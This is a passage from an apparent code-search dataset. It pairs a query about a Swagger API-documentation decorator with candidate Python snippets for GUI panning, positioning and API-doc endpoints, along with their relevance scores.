# dx /= 20\n # dy /= 20\n # dbg(dx)\n # dbg(dy)\n\n # print \"PAN %d %d\" % (dx, dy)\n # print self.GetViewStart()\n currx, curry = self.GetViewStart()\n self.Scroll(\n currx + dx, curry + dy\n ) # Note The positions are in scroll units, not pixels, so to convert to pixels you will have to multiply by the number of pixels per scroll increment. If either parameter is -1, that position will be ignored (no change in that direction).\n # print \"Scroll pan %d %d\" % (currx+dx, curry+dy)\n\n # adjust remembered X,Y\n self.last_drag_x = x\n self.last_drag_y = y\n\n # redraw client area\n self.Update()", "def pan(self,dx=0.0,dy=0.0):\n self._obj['x'] += dx\n self._obj['y'] += dy\n return self._obj", "def pan(self, dx, dy):\n d = self.getDistance()\n vr = self.getViewRight()\n vr *= dx*d\n GL.glTranslate(vr[0], vr[1], vr[2])\n vu = self.getViewUp()\n vu *= dy*d\n GL.glTranslate(vu[0], vu[1], vu[2])", "def mouseMoveEvent(self, ev):\n shift = ev.modifiers() & QtCore.Qt.ShiftModifier\n ctrl = ev.modifiers() & QtCore.Qt.ControlModifier\n if shift:\n y = ev.pos().y()\n if not hasattr(self, '_prev_zoom_pos') or not self._prev_zoom_pos:\n self._prev_zoom_pos = y\n return\n dy = y - self._prev_zoom_pos\n def delta():\n return -dy * 5\n ev.delta = delta\n self._prev_zoom_pos = y\n self.wheelEvent(ev)\n elif ctrl:\n pos = ev.pos().x(), ev.pos().y()\n if not hasattr(self, '_prev_pan_pos') or not self._prev_pan_pos:\n self._prev_pan_pos = pos\n return\n dx = pos[0] - self._prev_pan_pos[0]\n dy = pos[1] - self._prev_pan_pos[1]\n self.pan(dx, dy, 0, relative=True)\n self._prev_pan_pos = pos\n else:\n super(PlotObject, self).mouseMoveEvent(ev)", "def set_position(self, position):\n self.gripper_io.set_signal_value(\"position_m\", position)", "def setPosition(position):", "def pan(self, dx, dy):\n d = self.getDistance()\n vr = self.getViewRight()\n vr *= dx*d\n GL.glTranslatef(vr[0], vr[1], vr[2])\n vu = self.getViewUp()\n vu *= dy*d\n GL.glTranslatef(vu[0], vu[1], vu[2])", "def set_position( self ):\n\t\tscreen_rect = self.get_preview_window_screen_rect( )\n\n\t\twhile screen_rect.Intersects( self.GetScreenRect( ) ):\n\t\t\tpos = self.GetPosition( )\n\t\t\tself.SetPosition( ( pos[ 0 ] - 2, pos[ 1 ] + 2 ) )", "def pan(self):\n return self._pan", "def setPosition(self):\n self.data['pos-x'] = \"%s\" % self.x()\n self.data['pos-y'] = \"%s\" % self.y()", "def xview_moveto(self, fraction):\n self.tk.call(self._w, 'xview', 'moveto', fraction)", "def update_simulate_plot(self):\n a = self.plot_zoom.getViewBox().viewRange()\n self.plot_simulate.setXRange(a[0][0], a[0][1])\n self.plot_simulate.setYRange(a[1][0], a[1][1])", "def reposition(self, x, y):\n self.groupx = x\n self.groupy = y\n self.call('reposition', x, y)", "def updatePos(self):\n self.setPos(self.centerX-self.boundingRect().width()/2.0,\n self.centerY-self.boundingRect().height()/2.0)", "def set_drone_position(self, new_point):\n self.drone.set_drone_position(new_point)", "def set_panning_mouse(self):\n # Panning: left button mouse\n self.set('LeftClickMove', 'Pan',\n param_getter=lambda p: (p[\"mouse_position_diff\"][0],\n p[\"mouse_position_diff\"][1]))", "def test_pan():\n _a = io.load_vec(os.path.join(path, f1))\n _c = _a.piv.pan(1.0, -1.0) # note the use of .piv.\n assert np.allclose(_c.coords[\"x\"][0], 1.312480)\n assert np.allclose(_c.coords[\"y\"][0], -1.31248)", "def set_panning_keyboard(self):\n # Panning: keyboard arrows\n self.set('KeyPress', 'Pan',\n key='Left',\n param_getter=lambda p: (.24, 0))\n self.set('KeyPress', 'Pan',\n key='Right',\n param_getter=lambda p: (-.24, 0))\n self.set('KeyPress', 'Pan',\n key='Up',\n param_getter=lambda p: (0, -.24))\n self.set('KeyPress', 'Pan',\n key='Down',\n param_getter=lambda p: (0, .24))", "def Position(self, pos):\r\n\r\n self.dock_pos = pos\r\n return self", "def set_view(self):\n self.scene.mlab.view(azimuth=90.0, elevation=-90.0)", "def yview_moveto(self, fraction):\n self.tk.call(self._w, 'yview', 'moveto', fraction)", "def move(self, p):\r\n self.position.setvalue(p)", "def move(self):\n \n self.position = self.wander()", "def setPos(self, pos):\n self.cameraNode.setPos(pos)", "def mouseReleaseEvent(self, ev):\n super(PlotObject, self).mouseReleaseEvent(ev)\n if self._downpos == ev.pos():\n x = ev.pos().x()\n y = ev.pos().y()\n if ev.button() == 2 :\n self.mPosition()\n elif ev.button() == 1:\n x = x - self.width() / 2\n y = y - self.height() / 2\n #self.pan(-x, -y, 0, relative=True)\n print(self.opts['center'])\n print(x,y)\n self._prev_zoom_pos = None\n self._prev_pan_pos = None", "def setPosition(self, position, view) -> None:\n ...", "def set_axial_view(self):\n self.renderer.ResetCamera()\n fp = self.renderer.GetActiveCamera().GetFocalPoint()\n p = self.renderer.GetActiveCamera().GetPosition()\n dist = math.sqrt((p[0] - fp[0]) ** 2 + (p[1] - fp[1]) ** 2 + (p[2] - fp[2]) ** 2)\n self.renderer.GetActiveCamera().SetPosition(fp[0], fp[1], fp[2] + dist)\n self.renderer.GetActiveCamera().SetViewUp(0.0, 1.0, 0.0)\n self.renderer.GetActiveCamera().Zoom(1.8)\n self.render_window.Render()", "def positionZoomed(self):\n rect_size = self._image.get_rect()\n\n if rect_size.width > 720:\n self.x = (int((720 - rect_size.width ) / 2))\n\n if rect_size.height > 720:\n self.y = (int((720 - rect_size.height) / 2))", "def setPose(self, newPosition):\n self.origin1 = newPosition\n self.axis1 = self.G_gl[0:3, 0:3] @ self.axis0", "def SetPane(self, p):\r\n \r\n self.pane = p", "def new_position(self, p):\n if self.track:\n self.gnx = p.gnx\n else:\n p = self.get_position()\n\n self.new_position_edit(p)\n self.new_position_view(p)", "def pan(self, renderer, camera, x, y, last_x, last_y, center_x, center_y):\n\n f_point = camera.GetFocalPoint()\n f_point_0 = f_point[0]\n f_point_1 = f_point[1]\n f_point_2 = f_point[2]\n\n p_point = camera.GetPosition()\n p_point_0 = p_point[0]\n p_point_1 = p_point[1]\n p_point_2 = p_point[2]\n\n renderer.SetWorldPoint(f_point_0, f_point_1, f_point_2, 1.0)\n renderer.WorldToDisplay()\n d_point = renderer.GetDisplayPoint()\n focal_depth = d_point[2]\n\n a_point_0 = center_x + (x - last_x)\n a_point_1 = center_y + (y - last_y)\n\n renderer.SetDisplayPoint(a_point_0, a_point_1, focal_depth)\n renderer.DisplayToWorld()\n r_point = renderer.GetWorldPoint()\n r_point_0 = r_point[0]\n r_point_1 = r_point[1]\n r_point_2 = r_point[2]\n r_point_3 = r_point[3]\n\n if r_point_3 != 0.0:\n r_point_0 = r_point_0 / r_point_3\n r_point_1 = r_point_1 / r_point_3\n r_point_2 = r_point_2 / r_point_3\n\n camera.SetFocalPoint((f_point_0 - r_point_0) / 2.0 + f_point_0,\n (f_point_1 - r_point_1) / 2.0 + f_point_1,\n (f_point_2 - r_point_2) / 2.0 + f_point_2)\n camera.SetPosition((f_point_0 - r_point_0) / 2.0 + p_point_0,\n (f_point_1 - r_point_1) / 2.0 + p_point_1,\n (f_point_2 - r_point_2) / 2.0 + p_point_2)\n self.ren_win.Render()", "def setDesiredPosition(self, x, y):\n (self.setX, self.setY) = (x , y)", "def setPos(self,pos):\n self.Xpos,self.Ypos=pos", "def set_pos(self, x, y, orien):\n self.pos_x = x\n self.pos_y = y\n self.orientation = orien", "def update_zoom_plot(self):\n self.plot_zoom.setXRange(*self.linear_region.getRegion(), padding=0)", "def set_new_location(self, xPos, yPos):", "def set_position(self, x, y):\n self.position.x = x\n self.position.y = y\n self.rect.topleft = x, y", "def panZoom(*args, absolute: bool=True, downDistance: float=0.0, leftDistance: float=0.0,\n relative: bool=True, rightDistance: float=0.0, upDistance: float=0.0, zoomRatio:\n float=0.0, **kwargs)->None:\n pass", "def set_position(self, position):\n self.set_current_position(position)", "def set_position(self, x, y):\n self.tx = -x\n self.ty = -y", "def teleport(self, x, y):\n self.rect.x = x\n self.rect.y = y", "def setPosition(self):\n # determine posX, posY for battle\n (x1,y1) = globals.battlemapQuadrants[self.systemGrid]\n self.posX = x1+self.setX\n self.posY = y1+self.setY", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def set_position(self, new_pos):\n self._position = new_pos", "def plot_se_pan_positions(self):\n plt.figure(figsize=(10,10))\n plt.plot(self.pan['RAJ2000'],self.pan['DEJ2000'],'bo',markersize=10,mfc='None',label='PanSTARRS')\n \n plt.plot(self.secat['ALPHA_J2000'],self.secat['DELTA_J2000'],'r.',label='SE')\n plt.legend()\n plt.gca().invert_xaxis()\n #print(f\"number of matched sources = {np.sum(zp.matchflag)}\")\n\n # add circle\n\n circle1 = plt.Circle((self.centerRA, self.centerDEC), self.radius, color='c',alpha=.2)\n plt.gca().add_patch(circle1)\n\n plt.savefig('plots/'+self.plotprefix.replace('.fits','')+'se-pan-positions.png')", "def set_view(self, s):\n #s.scene.reset_zoom()\n s.scene.z_plus_view()\n c = s.scene.camera\n c.azimuth(30)\n c.elevation(30)\n s.render()", "def SetPoint(self, pt):\r\n \r\n self._pointDrag = pt", "def setCoordsToMainFromPivot(self):\n\t\tself.grp.a.t.v = self.piv.translate\n\t\tself.grp.a.r.v = self.piv.rotation[0]", "def reset_position(self):\n self.rect.left, self.rect.top = self.start_pos", "def change_pos(self, direction):\n if direction == Direction.UP:\n self._y_pos -= 1\n elif direction == Direction.DOWN:\n self._y_pos += 1\n elif direction == Direction.LEFT:\n self._x_pos -= 1\n elif direction == Direction.RIGHT:\n self._x_pos += 1\n self._coordinates = self.coordinates()", "def set_position(self, position):\n self.position = position", "def set_view(self, s):\n #s.scene.reset_zoom()\n s.scene.z_plus_view()\n c = s.scene.camera\n c.azimuth(-30)\n c.elevation(20)\n s.render()", "def teleport(self, x, y, reset_rotation=False):\n self.center[0] = x\n self.center[1] = y\n self.rect.center = tuple(self.center) # update pygame sprite placement\n if reset_rotation:\n self.rotate(-self.rotation)", "def set_position(self, x, y):\n self.geometry('%s%s' % (x, y))", "def RepositionPane(self, pane, wnd_pos, wnd_size):\r\n\r\n pane_pos = pane.floating_pos\r\n pane_size = pane.floating_size\r\n\r\n snap = pane.snapped\r\n if snap == wx.LEFT:\r\n floating_pos = wx.Point(wnd_pos.x - pane_size.x, pane_pos.y)\r\n elif snap == wx.TOP:\r\n floating_pos = wx.Point(pane_pos.x, wnd_pos.y - pane_size.y)\r\n elif snap == wx.RIGHT:\r\n floating_pos = wx.Point(wnd_pos.x + wnd_size.x, pane_pos.y)\r\n elif snap == wx.BOTTOM:\r\n floating_pos = wx.Point(pane_pos.x, wnd_pos.y + wnd_size.y)\r\n\r\n if snap:\r\n if pane_pos != floating_pos:\r\n pane.floating_pos = floating_pos\r\n self._from_move = True\r\n pane.frame.SetPosition(pane.floating_pos)\r\n self._from_move = False", "def set_location(self, x, y):\n self.scene.set_location(x, y)\n self.redraw()", "def on_mouse_move(self, event):\n self.mouse = [event.xdata, event.ydata]\n\n # Update pan view on mouse move\n if self.panning is True:\n for a in self.pan_axes:\n a.drag_pan(1, event.key, event.x, event.y)\n\n # Async re-draw (redraws only on thread idle state, uses timer on backend)\n self.canvas.draw_idle()\n\n ##### Temporary place-holder for cached update #####\n self.update_screen_request.emit([0, 0, 0, 0, 0])", "def setzePosition(self, x, y):\n self.zielX = x\n self.zielY = y", "def __move_to(self, event):\n self.canvas_image.scan_dragto(event.x, event.y, gain=1)\n self.to_coord = (event.x, event.y)\n self.__show_image() # zoom tile and show it on the canvas", "def set_position(self, az_pos, el_pos):\n raise NotImplementedError()", "def setPosition(self,newPos):\n self._position = newPos", "def update():\n global dragon, x, y, position, angle_left, angle_right, size, new\n x, y, position, angle_left, angle_right, new = modify_pos(x, y, position,\n angle_left,\n angle_right,\n size, new)\n dragon.setData(x, y) # update plot", "def hack_position(self, instance, value):\n if dp(1) > 1: # Detect a Retina Mac\n self.slider.center_x = self.center_x -18", "def set_position(self, position):\r\n\r\n self.position = position\r\n if (self.rect):\r\n self.rect.x = position[0]\r\n self.rect.y = position[1]", "def _on_move(self, event):\n\n if not self.button_pressed:\n return\n\n if self.M is None:\n return\n\n x, y = event.xdata, event.ydata\n # In case the mouse is out of bounds.\n if x == None:\n return\n\n dx, dy = x - self.sx, y - self.sy\n x0, x1 = self.get_xlim()\n y0, y1 = self.get_ylim()\n w = (x1-x0)\n h = (y1-y0)\n self.sx, self.sy = x, y\n\n # Rotation\n if self.button_pressed in self._rotate_btn:\n # rotate viewing point\n # get the x and y pixel coords\n if dx == 0 and dy == 0:\n return\n self.elev = art3d.norm_angle(self.elev - (dy/h)*180)\n self.azim = art3d.norm_angle(self.azim - (dx/w)*180)\n self.get_proj()\n self.figure.canvas.draw()\n\n# elif self.button_pressed == 2:\n # pan view\n # project xv,yv,zv -> xw,yw,zw\n # pan\n# pass\n\n # Zoom\n elif self.button_pressed in self._zoom_btn:\n # zoom view\n # hmmm..this needs some help from clipping....\n minx, maxx, miny, maxy, minz, maxz = self.get_w_lims()\n df = 1-((h - dy)/h)\n dx = (maxx-minx)*df\n dy = (maxy-miny)*df\n dz = (maxz-minz)*df\n self.set_xlim3d(minx - dx, maxx + dx)\n self.set_ylim3d(miny - dy, maxy + dy)\n self.set_zlim3d(minz - dz, maxz + dz)\n self.get_proj()\n self.figure.canvas.draw()", "def set_place_frame_parameter(self):\n pos_x = self.ui.scrollArea.width()\n self.ui.frame_navigator.setGeometry(\n QtCore.QRect(pos_x - 180, 10, 160, 290))\n self.ui.frame_panorama.setGeometry(\n QtCore.QRect(pos_x - 220, 10, 210, 80))", "def set_position(self, position):\n raise NotImplementedError()", "def updatePosition(self, scene):\n\n pos = scene.posFromLonLat(self._lon, self._lat)\n self.setPos(pos)\n if self._min_zoom is not None:\n self.setVisible(scene._zoom >= self._min_zoom)", "def pan_sequence_number(self, pan_sequence_number):\n\n self._pan_sequence_number = pan_sequence_number", "def move(self, pos):\n self.widget.move(*pos)", "def set_pub_robot_pose(self, x, y, yaw):\r\n self.publisher_robot.set_pose_by_center(x, y, yaw)", "def set_position(self, point, reset=False, render=True):\n if isinstance(point, np.ndarray):\n if point.ndim != 1:\n point = point.ravel()\n self.camera.position = scale_point(self.camera, point, invert=False)\n if reset:\n self.reset_camera(render=render)\n self.camera_set = True\n self.Modified()", "def move(self):\n self.center_x += self._vx\n self.center_y += self._vy", "def move(self):\n \n self.position = self.explore()", "def setCenter(self, p):\n self.__center = p", "def position(self, position):\n self.move_to(position)", "def setCamera(self, viewX=0, viewY=0):\n self.viewX = viewX\n self.viewY = viewY", "def pos_image(image, x,y):\n image.anchor_x = x\n image.anchor_y = y", "def adjust_mario_position(self):\n self.last_x_position = self.mario.rect.right\n self.mario.rect.x += round(self.mario.x_vel)\n self.check_mario_x_collisions()\n\n if self.mario.in_transition_state == False:\n self.mario.rect.y += round(self.mario.y_vel)\n self.check_mario_y_collisions()", "def drag(self,x,y):\n self.x=x\n self.y=y", "def SetDockPos(self, source):\r\n \r\n self.dock_direction = source.dock_direction\r\n self.dock_layer = source.dock_layer\r\n self.dock_row = source.dock_row\r\n self.dock_pos = source.dock_pos\r\n self.dock_proportion = source.dock_proportion\r\n self.floating_pos = wx.Point(*source.floating_pos)\r\n self.floating_size = wx.Size(*source.floating_size)\r\n self.rect = wx.Rect(*source.rect)\r\n \r\n return self", "def move(self, offset):\n self._transform(\n [\n [1, 0, 0],\n [0, 1, 0],\n [0, 0, 1],\n ], center=None, offset=list(offset))", "def switch_origin(self):\n self.origin = 'bottom' if self.origin == 'top' else 'top'", "def reset_position(self): \n self.rect.x = 400\n self.rect.y = 400\n \n # Specifies the Player's spawnpoint as maze_arrangement[8][8], representing\n # the tile in the center of the maze \n self.__minotaur_x = 8\n self.__minotaur_y = 8", "def setAxisPagePosition(x,y):\n dislin.axspos(x,y)" ]
[ "0.7055883", "0.7055883", "0.69751316", "0.66623855", "0.65398514", "0.6447946", "0.6447465", "0.64395374", "0.6402126", "0.63889927", "0.63513035", "0.63486654", "0.63106734", "0.6296175", "0.6237631", "0.62298304", "0.62075496", "0.6197965", "0.61601925", "0.61556464", "0.61436063", "0.61419624", "0.61272776", "0.61109114", "0.6109658", "0.6097748", "0.6088771", "0.6075214", "0.60668606", "0.60615", "0.6034026", "0.6030149", "0.6018918", "0.6003176", "0.59879667", "0.5971258", "0.59551525", "0.5947885", "0.59392583", "0.5937792", "0.5934036", "0.59132606", "0.5887031", "0.5868367", "0.5860671", "0.5841896", "0.58369875", "0.58353436", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5831068", "0.58257824", "0.5820576", "0.58129025", "0.58100474", "0.58088315", "0.5804052", "0.579886", "0.5794948", "0.5793313", "0.5785398", "0.57631683", "0.57625026", "0.57602644", "0.5758778", "0.57391346", "0.5735134", "0.57348746", "0.57278603", "0.5721971", "0.5721169", "0.5720374", "0.57192475", "0.5718916", "0.5707418", "0.5706756", "0.57033587", "0.5695764", "0.56953156", "0.56847715", "0.5681354", "0.56761307", "0.5673489", "0.5672623", "0.56705725", "0.5659352", "0.5658152", "0.56396186", "0.5636861", "0.5632796", "0.5624474", "0.5620714" ]
0.0
-1
Decorator to be used in apimethods to serve the swaggerdocumentation for this api.
def api_documentation(api: str, summary: str, in_model: BaseModel, out_model: BaseModel, out_description: str) -> Callable: for model, name in ((in_model, 'Input'), (out_model, 'Output')): doc.Object( make_dataclass( f'Api{api[1:].title()}{name}', [(key, val.type_, val.type_) for key, val in model.__dict__['__fields__'].items()])) im_returns = doc.JsonBody({ key: val.type_ for key, val in in_model.__dict__['__fields__'].items() }) om_returns = { key: val.type_ for key, val in out_model.__dict__['__fields__'].items() } def decorator(func): @doc.summary(summary) @doc.response(412, 'Error: Precondition Failed', description='The passed request-parameters are invalid') @doc.response(500, 'Error: Server-Error occured', description='An internal error occured') @doc.consumes(im_returns, content_type='application/json', location='body') @doc.produces(om_returns, content_type='application/json', description=out_description) @wraps(func) async def function_wrapper(request, *args, **kwargs): return await func(request=request, *args, **kwargs) return function_wrapper return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def index():\n definition = {\n \"swagger\": \"2.0\",\n \"info\": {\n \"title\": flask.current_app.config.get(\"APPNAME\", \"Not specified\"),\n \"version\": flask.current_app.config.get(\"VERSION\", \"Not specified\"),\n },\n \"host\": request.host,\n \"schemes\": [\"http\"],\n \"consumes\": [\"application/json\"],\n \"produces\": [\"application/json\"],\n \"definitions\": registry._definitions,\n \"paths\": {}\n }\n\n rules = list(flask.current_app.url_map.iter_rules())\n for r in sorted(rules, key=operator.attrgetter('rule')):\n if r.rule.startswith('/static'):\n continue\n if r.endpoint in registry._skipped:\n continue\n\n rule = re.sub(r\"<(?:[_a-zA-Z0-9\\(\\)]+:)?([a-zA-Z0-9_]+)>\", r\"{\\1}\", r.rule)\n if rule not in definition['paths']:\n definition['paths'][rule] = {}\n\n methods_handled = r.methods & REST_METHODS\n handler = flask.current_app.view_functions.get(r.endpoint)\n doc = handler.func_doc\n\n if len(methods_handled) == 1:\n method = methods_handled.pop().lower()\n try:\n validated = yaml.safe_load(doc)\n if not isinstance(validated, dict):\n raise Exception(\"Not a descriptor\")\n definition['paths'][rule][method] = validated\n except Exception:\n pass\n\n else:\n # We need to handle multi-method docstrings differently\n # because the documentation needs to define both, and\n # it's a higher level of the swagger hierarchy\n try:\n validated = yaml.safe_load(doc)\n if not isinstance(validated, dict):\n raise Exception(\"Not a descriptor\")\n definition['paths'][rule].update(validated)\n except Exception:\n definition['paths'][rule] = {}\n\n resp = flask.make_response(\n json.dumps(definition, for_json=True))\n resp.headers.set(\"Content-type\", 'application/json')\n resp.headers.set(\"Access-Control-Allow-Origin\", \"*\")\n return resp", "def apiDocs():\n\treturn render_template('apiDocs.html')", "def swagger_redirect(request: HttpRequest) -> HttpResponse:\n return HttpResponse('Use /api/v2/docs/ instead', status=410)", "def swagger():\n return jsonify(current_app.spec.to_dict())", "def describe(self, *args, **kwargs):\n def _autodoc(func, *_args, **_kwargs):\n if len(_args) > 0:\n #: Instance or class method.\n response = func(_args[0])\n else:\n #: Function.\n if len(_kwargs) > 0:\n response = func(**_kwargs)\n else:\n response = func()\n\n self.parse(args[0], response)\n\n return func\n\n return decorator(_autodoc)", "def get_documentation(self, *args, **dargs):\n pass", "def swagger_definition(self, base_path=None, **kwargs):\n return Swagger(\n {\n \"info\": Info(\n {\n key: kwargs.get(key, self.DEFAULT_INFO.get(key))\n for key in Info.fields.keys()\n if key in kwargs or key in self.DEFAULT_INFO\n }\n ),\n \"paths\": self.paths,\n \"swagger\": \"2.0\",\n \"basePath\": base_path,\n }\n ).to_primitive()", "def documentation_only():\n pass", "def DeveloperAPI(*args, **kwargs):\n if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):\n return DeveloperAPI()(args[0])\n\n def wrap(obj):\n _append_doc(obj, message='DeveloperAPI: This API may change across minor Ludwig releases.')\n _mark_annotated(obj)\n return obj\n return wrap", "async def handle_doc(self, request: web.Request) -> web.Response:\n spec = request.app[\"spec\"]\n spec_url = request.app.router[\"openapi_spec\"].url_for()\n title = spec.info.title\n html = f\"\"\"\n <!DOCTYPE html>\n <html>\n <head>\n <title>{title}</title>\n <!-- needed for adaptive design -->\n <meta charset=\"utf-8\"/>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n \"\"\"\n if self.font:\n html += f\"\"\"\n <link href=\"https://fonts.googleapis.com/css?{self.font}\" rel=\"stylesheet\">\n \"\"\"\n html += f\"\"\"\n <link rel=\"shortcut icon\" href=\"{self.favicon_url}\">\n <!--\n ReDoc doesn't change outer page styles\n -->\n <style>\n body {{\n margin: 0;\n padding: 0;\n }}\n </style>\n </head>\n <body>\n <redoc spec-url=\"{spec_url}\"></redoc>\n <script src=\"{self.redoc_js_url}\"> </script>\n </body>\n </html>\n \"\"\"\n return web.Response(text=html, content_type=\"text/html\")", "def api():\n return send_file('templates/bootstrapper.swagger.json')", "def main():\n\n return redirect('/apidocs')", "def generate_documentation(self):\n self.generate_api_docs()\n build.main([\n self.SOURCE_DIR,\n self.BUILD_DIR,\n ])", "def overview():\n return render_template('api/api.html', title='API Overview')", "def api_index():\n func_list = {}\n for rule in app.url_map.iter_rules():\n if rule.endpoint != 'static':\n func_list[rule.rule] = app.view_functions[rule.endpoint].__doc__\n return jsonify(func_list)", "def documentation():\n return render_template('help.html')", "def get_swagger_view(title=None, url=None, patterns=None, urlconf=None):\n class SwaggerSchemaView(APIView):\n _ignore_model_permissions = True\n exclude_from_schema = True\n permission_classes = [AllowAny]\n renderer_classes = [\n CoreJSONRenderer,\n renderers.OpenAPIRenderer,\n renderers.SwaggerUIRenderer\n ]\n\n def get(self, request):\n generator = CustomSchemaGenerator(\n title=title,\n url=url,\n patterns=patterns,\n urlconf=urlconf\n )\n schema = generator.get_schema(request=request, public=True)\n\n if not schema:\n raise exceptions.ValidationError(\n 'The schema generator did not return a schema Document'\n )\n\n return Response(schema)\n\n return SwaggerSchemaView.as_view()", "def test_swagger(self):\n response = self.client.get(\"/api/v1/swagger\", query_string=dict(validate_schema=True))\n assert_that(response.status_code, is_(equal_to(200)))\n swagger = loads(response.get_data().decode(\"utf-8\"))\n # we have the swagger docs endpoint too, which is implemented as a query.\n # ignore it here for now.\n del swagger[\"paths\"][\"/swagger/docs\"]\n assert_that(swagger[\"paths\"], is_(equal_to({\n \"/foo/get\": {\n \"get\": {\n \"description\": \"My doc string\",\n \"tags\": [\"foo\"],\n \"responses\": {\n \"default\": {\n \"description\": \"An error occurred\", \"schema\": {\n \"$ref\": \"#/definitions/Error\",\n }\n },\n \"200\": {\n \"description\": \"My doc string\",\n \"schema\": {\n \"$ref\": \"#/definitions/QueryResult\",\n }\n }\n },\n \"parameters\": [\n {\n \"in\": \"header\",\n \"name\": \"X-Response-Skip-Null\",\n \"required\": False,\n \"type\": \"string\",\n \"description\": \"Remove fields with null values from the response.\"\n },\n {\n \"required\": False,\n \"type\": \"string\",\n \"name\": \"optional_value\",\n \"in\": \"query\",\n },\n {\n \"required\": True,\n \"type\": \"string\",\n \"name\": \"required_value\",\n \"in\": \"query\",\n },\n ],\n \"operationId\": \"query\",\n }\n }\n })))", "def api(self) -> str:", "def __init_subclass__(cls, **kwargs):\n super().__init_subclass__(**kwargs)\n\n if not __name__ == cls.__module__:\n # e.g.: cls.__module__ = mpcontribs.api.projects.views\n views_path = cls.__module__.split(\".\")\n doc_path = \".\".join(views_path[:-1] + [\"document\"])\n cls.tags = [views_path[-2]]\n doc_filepath = doc_path.replace(\".\", os.sep) + \".py\"\n if os.path.exists(doc_filepath):\n cls.doc_name = cls.tags[0].capitalize()\n Model = getattr(import_module(doc_path), cls.doc_name)\n cls.schema_name = cls.doc_name + \"Schema\"\n cls.Schema = type(\n cls.schema_name,\n (ModelSchema, object),\n {\n \"Meta\": type(\n \"Meta\",\n (object,),\n dict(model=Model, ordered=True, model_build_obj=False),\n )\n },\n )\n cls.definitions = {cls.schema_name: schema2jsonschema(cls.Schema)}\n cls.resource.schema = cls.Schema\n\n # write flask-mongorest swagger specs\n for method in cls.methods:\n spec = get_specs(cls, method, cls.tags[0])\n if spec:\n dir_path = os.path.join(DOC_DIR, cls.tags[0])\n file_path = os.path.join(dir_path, method.__name__ + \".yml\")\n if not os.path.exists(file_path):\n os.makedirs(dir_path, exist_ok=True)\n\n if is_gunicorn:\n with open(file_path, \"w\") as f:\n yaml.dump(spec, f)\n logger.debug(\n f\"{cls.tags[0]}.{method.__name__} written to {file_path}\"\n )", "def use_in_api_documentation(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"use_in_api_documentation\")", "def documentation():\n return auto.html()", "def get_swagger_view(title=None, url=None, patterns=None, urlconf=None):\n class SwaggerSchemaView(APIView):\n _ignore_model_permissions = True\n exclude_from_schema = True\n permission_classes = [AllowAny]\n renderer_classes = [\n CoreJSONRenderer,\n renderers.OpenAPIRenderer,\n renderers.SwaggerUIRenderer\n ]\n\n def get(self, request):\n generator = SchemaGenerator(\n title=title,\n url=url,\n patterns=patterns,\n urlconf=urlconf\n )\n schema = generator.get_schema(request=request)\n\n if not schema:\n raise exceptions.ValidationError(\n 'The schema generator did not return a schema Document'\n )\n\n return Response(schema)\n\n return SwaggerSchemaView.as_view()", "def __call__(self, func):\n func.__doc__ = self.doc\n return func", "def wrapper(*args, **kwargs):\n print(f\"you are about to call {fn.__name__}\")\n print(f\"Here's the documentation: {fn.__doc__}\")\n return fn(*args, **kwargs)", "def _rapidoc(request: HttpRequest) -> HttpResponse:\n return render(request, 'rapidoc.html', {\n 'schema': reverse('api:v2:schema'),\n })", "def make_doc():\n doc_app = Flask(__name__)\n doc_app.register_blueprint(blueprint(no_doc=False))\n return doc_app", "def view(self, **options: Any) -> Callable:\n\n def decorator(f):\n rule = \"/\"\n endpoint = options.pop(\"endpoint\", f.__name__)\n self.add_url_rule(rule, endpoint, f, **options)\n return f\n\n return decorator", "def generate_apidoc_patches(self):\n base_path = self.paths[\"api_doc_dir\"]\n from django_swagger_utils.core.utils.mk_dirs import MkDirs\n MkDirs().mk_dir_if_not_exits(file_name=base_path + \"/\")\n\n from django_swagger_utils.apidoc_gen.generators.patch_generator import PatchGenerator\n\n patch_generator = PatchGenerator(self.app_name, self.parser, self.paths, base_path)\n # generating api docs\n patch_generator.generate_json_patch()", "def get_documentation():\n return send_file(base_dir / \"static/documentation.html\", \"text/html; charset=UTF-8\")", "def doc_apply(doc):\n\n def wrapper(func):\n func.__doc__ = doc\n return func\n\n return wrapper", "def show_documentation(self):\n self.docs = documentation.Documentation()", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def use_in_api_documentation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"use_in_api_documentation\")", "def __init__(self, loop=None, config=None):\n\n self.logger = logging.getLogger(self.__class__.__name__)\n self.loop = loop if loop is not None else asyncio.get_event_loop()\n self.config = config\n\n swagger_url = self.prefix_context_path(\"/doc\")\n\n self.app = aiohttp.web.Application(loop=loop, middlewares=[functools.partial(api_middlewares.rest_error_middleware, logger=self.logger)])\n self.app.factory = self\n\n self.app.router.add_route(\"GET\", \"/\", lambda x: aiohttp.web.HTTPFound(swagger_url))\n if self.config.context_path != \"/\":\n self.app.router.add_route(\"GET\", self.config.context_path, lambda x: aiohttp.web.HTTPFound(swagger_url))\n self.app.router.add_route(\"GET\", self.config.context_path + \"/\", lambda x: aiohttp.web.HTTPFound(swagger_url))\n self.app.router.add_route(\n \"GET\",\n self.prefix_context_path(\"/appointments/{user_type}/{control_type}/{vehicle_type}/{organism}/{site}/{start_date}/{end_date}\"),\n resources.RestAppointments().get,\n )\n self.app.router.add_route(\"GET\", self.prefix_context_path(\"/sites\"), resources.RestSites().get)\n self.app.router.add_route(\"GET\", self.prefix_context_path(\"/vehicles\"), resources.RestVehicles().get)\n self.app.router.add_route(\"GET\", self.prefix_context_path(\"/appointments/ws\"), resources.WsAppointments().get)\n\n # Setup Swagger\n # bundle_params and schemes are a GitHub patch not released\n # in any aiohttp_swagger package\n setup_swagger_sign = inspect.signature(aiohttp_swagger.setup_swagger)\n kwargs = {}\n if \"bundle_params\" in setup_swagger_sign.parameters:\n kwargs[\"bundle_params\"] = {\"layout\": \"BaseLayout\", 